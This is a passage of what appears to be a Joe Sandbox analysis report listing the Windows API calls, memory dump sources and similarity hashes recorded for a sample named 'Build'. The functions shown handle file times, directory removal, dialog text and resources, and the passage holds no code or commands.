                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00B49343,?,?,?), ref: 00B4C1EE
                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,00B49343,?,?), ref: 00B4C22C
                                                                                                                                                                                • SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,00B49343,?,?,?,?,?,?,?,?), ref: 00B4C2AF
                                                                                                                                                                                • CloseHandle.KERNEL32(00000800,?,?,?,00B49343,?,?,?,?,?,?,?,?,?,?), ref: 00B4C2B6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2287278272-0
                                                                                                                                                                                • Opcode ID: e4fc8899927e708a54bc05e1820c9a5abb313c28bcdc23df043bc984bb0cb79d
                                                                                                                                                                                • Instruction ID: 9eed82e69a10cb07e3cb8e76a8067cc32687de202f5a29a25642499ad5a28c2d
                                                                                                                                                                                • Opcode Fuzzy Hash: e4fc8899927e708a54bc05e1820c9a5abb313c28bcdc23df043bc984bb0cb79d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C41D530249381AEE361DF64DC41FABBBE8AF89B00F04099DF5D597181DAA49B489752
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 176396367-0
                                                                                                                                                                                • Opcode ID: f9a44febee580e86ec21ad1f5ca14b8ddb6a083778f1d93d98f3882b88bff9f0
                                                                                                                                                                                • Instruction ID: b179e0ec37cbd4596edc38321d786c6fce599a4be5f6d9b5507af356f0a96ff4
                                                                                                                                                                                • Opcode Fuzzy Hash: f9a44febee580e86ec21ad1f5ca14b8ddb6a083778f1d93d98f3882b88bff9f0
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D418171A087519FC725DF38CD45A9FBBE8EF85300F00496DF989D3250DB34A9498B96
                                                                                                                                                                                APIs
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4BD93
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4BDB6
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4BE4C
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4BEB1
                                                                                                                                                                                  • Part of subcall function 00B4C37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,00B487BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 00B4C3A5
                                                                                                                                                                                  • Part of subcall function 00B4BBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 00B4BC1C
                                                                                                                                                                                  • Part of subcall function 00B4BBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 00B4BC48
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcslen$DirectoryRemove$CloseFind
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 973666142-0
                                                                                                                                                                                • Opcode ID: 4ef4e69a826f42650d5a1cb75a06a5b08f25aa4cb0475b83f4213f082ab1169e
                                                                                                                                                                                • Instruction ID: db49e116b52de857a49f12ad24e24650f0ce17cd1e761953397811abb416829d
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ef4e69a826f42650d5a1cb75a06a5b08f25aa4cb0475b83f4213f082ab1169e
                                                                                                                                                                                • Instruction Fuzzy Hash: E641D97254439096CB30AB648845EFBB3E9DFC4300F444C9AEB8993141DB74DE88D791
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00B5C5F6
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B5C605
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B5C613
                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00B5C621
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                                                • Opcode ID: 7b190080aa03ce859b3e56c616c7d7b02c6f1cab5a35f23f73073ee6527dcdc9
                                                                                                                                                                                • Instruction ID: bbd117c5d46ce853a198d861ab53165f896d21f5edda24bf93af798fce3a7fe6
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b190080aa03ce859b3e56c616c7d7b02c6f1cab5a35f23f73073ee6527dcdc9
                                                                                                                                                                                • Instruction Fuzzy Hash: 81E0EC719CD660ABD3215B60AC1EF963FA4EB1A713F040045FA01A72A0CEB088458FE1
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B5C629: GetDC.USER32(00000000), ref: 00B5C62D
                                                                                                                                                                                  • Part of subcall function 00B5C629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B5C638
                                                                                                                                                                                  • Part of subcall function 00B5C629: ReleaseDC.USER32(00000000,00000000), ref: 00B5C643
                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00B5C7E0
                                                                                                                                                                                  • Part of subcall function 00B5CA67: GetDC.USER32(00000000), ref: 00B5CA70
                                                                                                                                                                                  • Part of subcall function 00B5CA67: GetObjectW.GDI32(?,00000018,?), ref: 00B5CA9F
                                                                                                                                                                                  • Part of subcall function 00B5CA67: ReleaseDC.USER32(00000000,?), ref: 00B5CB37
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                                • String ID: (
                                                                                                                                                                                • API String ID: 1061551593-3887548279
                                                                                                                                                                                • Opcode ID: 9fbe87e46f72e8db067d81cca0fbecda5a483a48785fb9304d9ea84acae680f6
                                                                                                                                                                                • Instruction ID: 98b11b8bab7ea8a49d4c3eef1a52fad3574f7ddd99ae43f440df0f661f129d7e
                                                                                                                                                                                • Opcode Fuzzy Hash: 9fbe87e46f72e8db067d81cca0fbecda5a483a48785fb9304d9ea84acae680f6
                                                                                                                                                                                • Instruction Fuzzy Hash: 5191F2716087549FD614DF29C844A2BBBE9FF89B01F00499EF98AD3260DB70AD45CF62
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcslen
                                                                                                                                                                                • String ID: }
                                                                                                                                                                                • API String ID: 176396367-4239843852
                                                                                                                                                                                • Opcode ID: 4cba24a25cf7544991b65ba30987a3b56e1b7da38e79bfd25f288db99d56b850
                                                                                                                                                                                • Instruction ID: bb9de984af3e1267c3246cc9afe825b54156b0149b16c0311c70087061b1eae6
                                                                                                                                                                                • Opcode Fuzzy Hash: 4cba24a25cf7544991b65ba30987a3b56e1b7da38e79bfd25f288db99d56b850
                                                                                                                                                                                • Instruction Fuzzy Hash: 3121AF329087455AE731EB64D845B6BB3EDEB84711F440AEAFA44C3241EA74ED4C87E2
                                                                                                                                                                                APIs
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B4D8D3
                                                                                                                                                                                  • Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __vswprintf_c_l_swprintf
                                                                                                                                                                                • String ID: %c:\
                                                                                                                                                                                • API String ID: 1543624204-3142399695
                                                                                                                                                                                • Opcode ID: 04d04b931e1fc762d8bcacd58d02c003c7a42e2989248b71e8fdcafac7ce763a
                                                                                                                                                                                • Instruction ID: 1bdc94fdd23440c71f9c1c26427eaff35909a7e77046c74647497f06f090a3b5
                                                                                                                                                                                • Opcode Fuzzy Hash: 04d04b931e1fc762d8bcacd58d02c003c7a42e2989248b71e8fdcafac7ce763a
                                                                                                                                                                                • Instruction Fuzzy Hash: EE0124635047117ADB306BB59C86D7FA7ECEED9360B40849AF484C2183EA24DA40D2B1
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B50244: _swprintf.LIBCMT ref: 00B50284
                                                                                                                                                                                  • Part of subcall function 00B50244: _strlen.LIBCMT ref: 00B502A5
                                                                                                                                                                                  • Part of subcall function 00B50244: SetDlgItemTextW.USER32(?,00B82274,?), ref: 00B502FE
                                                                                                                                                                                  • Part of subcall function 00B50244: GetWindowRect.USER32(?,?), ref: 00B50334
                                                                                                                                                                                  • Part of subcall function 00B50244: GetClientRect.USER32(?,?), ref: 00B50340
                                                                                                                                                                                • GetDlgItem.USER32(00000000,00003021), ref: 00B413AA
                                                                                                                                                                                • SetWindowTextW.USER32(00000000,00B765F4), ref: 00B413C0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                • API String ID: 2622349952-4108050209
                                                                                                                                                                                • Opcode ID: cde86e5a7f9c0a0a5ea74f19db2abe20b945d9976afbc04fafea988ba1c496b3
                                                                                                                                                                                • Instruction ID: 356cd38fae92bc2080e3939de979f385f7a424a6e3817bdafd92fa927606047d
                                                                                                                                                                                • Opcode Fuzzy Hash: cde86e5a7f9c0a0a5ea74f19db2abe20b945d9976afbc04fafea988ba1c496b3
                                                                                                                                                                                • Instruction Fuzzy Hash: E8F0AF3054824CBADF152F259C0DBE93BE8EB01314F0489D4FC49519A1DBB5CAD4FB54
                                                                                                                                                                                APIs
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00B531E7,?,?,00B5325F,?,?,?,?,?,00B53249), ref: 00B530D0
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00B5325F,?,?,?,?,?,00B53249), ref: 00B530DC
                                                                                                                                                                                  • Part of subcall function 00B47BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B47BD5
                                                                                                                                                                                Strings
                                                                                                                                                                                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B530E5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                                                                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                • API String ID: 1091760877-2248577382
                                                                                                                                                                                • Opcode ID: f4ee42da3de36d240687c6258ce59eabec575cf63909568e715467f7912410d9
                                                                                                                                                                                • Instruction ID: 21048c3c8dfe842cf6af605a30aeb339c3d41b1506e0feb084d68f99146daaef
                                                                                                                                                                                • Opcode Fuzzy Hash: f4ee42da3de36d240687c6258ce59eabec575cf63909568e715467f7912410d9
                                                                                                                                                                                • Instruction Fuzzy Hash: CAD05E3298C93037D61133245C5AD6E3A89EB62732F6047D4F53D6A2F5CF604E8192D1
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00B4F951,?), ref: 00B501FF
                                                                                                                                                                                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B4F951,?), ref: 00B5020D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FindHandleModuleResource
                                                                                                                                                                                • String ID: RTL
                                                                                                                                                                                • API String ID: 3537982541-834975271
                                                                                                                                                                                • Opcode ID: af8f500b3806c75fc6d4641aabe19f0ce4af83be4edeec4165b307708ff40b6b
                                                                                                                                                                                • Instruction ID: 51ca99be4c210d5a74848323d12a08d6cee99c8098ebca407ecc7faebcaaa92f
                                                                                                                                                                                • Opcode Fuzzy Hash: af8f500b3806c75fc6d4641aabe19f0ce4af83be4edeec4165b307708ff40b6b
                                                                                                                                                                                • Instruction Fuzzy Hash: C1C01231240B5156D63167716C4DB832FA4AB00711F050488F549EB1D0DAE6C8C58A60